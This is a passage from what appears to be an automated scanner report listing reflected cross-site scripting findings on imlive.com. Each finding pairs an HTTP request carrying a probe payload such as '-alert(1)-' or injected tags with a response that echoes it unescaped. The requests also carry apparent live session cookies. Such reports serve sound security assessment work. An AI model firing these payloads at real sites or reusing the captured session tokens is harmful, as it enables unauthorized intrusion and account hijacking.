Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 19417
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?aed33"><a>4a10453e31b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.559. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/preparesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac9b'-alert(1)-'0d66f31204c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 19578
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

4.560. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1979b'><a>18155b4088b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemap.html?1979b'><a>18155b4088b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:32 GMT
Connection: close
Content-Length: 33756
Vary: Accept-Encoding

<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html?1979b'><a>18155b4088b=1&lr=1107816008&ud=0&pe=sitemap.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.561. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/videosfr.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f44ce'><a>23f9fd95641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videosfr.asp?f44ce'><a>23f9fd95641=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:13 GMT
Connection: close
Content-Length: 15757
Vary: Accept-Encoding

<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp?f44ce'><a>23f9fd95641=1&lr=1107816009&ud=0&pe=videosfr.asp&qs=f44ce'>
...[SNIP]...

4.562. http://imlive.com/warningjx.aspx [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/warningjx.aspx

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a49'-alert(1)-'2edefc94fdc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /warningjx.aspx?redirect=/e2a49'-alert(1)-'2edefc94fdc HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:33 GMT
Connection: close
Content-Length: 2375
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
War
...[SNIP]...
<script type="text/javascript">
function IAgree(){document.location.href='?meAgree=yes&redirect=%2fe2a49'-alert(1)-'2edefc94fdc'; return false;}
function IDontAgree() { window.parent.location.href = "/"; return false; }
</script>
...[SNIP]...

4.563. http://imlive.com/warningms.asp [ms parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/warningms.asp

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5576b'><a>7cdefc4b49a was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?ms5576b'><a>7cdefc4b49a HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:11 GMT
Connection: close
Content-Length: 14486
Vary: Accept-Encoding

<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp?ms5576b'><a>7cdefc4b49a&lr=1107816008&ud=0&pe=warningms.asp&qs=ms5576b'>
...[SNIP]...

4.564. http://imlive.com/warningms.asp [ms parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/warningms.asp

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a366"><a>e4ecb16fbac was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?ms9a366"><a>e4ecb16fbac HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:00 GMT
Connection: close
Content-Length: 14486
Vary: Accept-Encoding

<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<A HREF="/liveexperts.asp?ms9a366"><a>e4ecb16fbac">
...[SNIP]...

4.565. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/warningms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d01b7'><a>ee151ed1363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?d01b7'><a>ee151ed1363=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 14469
Vary: Accept-Encoding

<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp?d01b7'><a>ee151ed1363=1&lr=1107816008&ud=0&pe=warningms.asp&qs=d01b7'>
...[SNIP]...

4.566. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-advanced-search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5982a'-alert(1)-'59971b4cff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 75081
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ad
...[SNIP]...

4.567. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/webcam-advanced-search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af1e"><a>4c3fec81c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-advanced-search/?9af1e"><a>4c3fec81c51=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
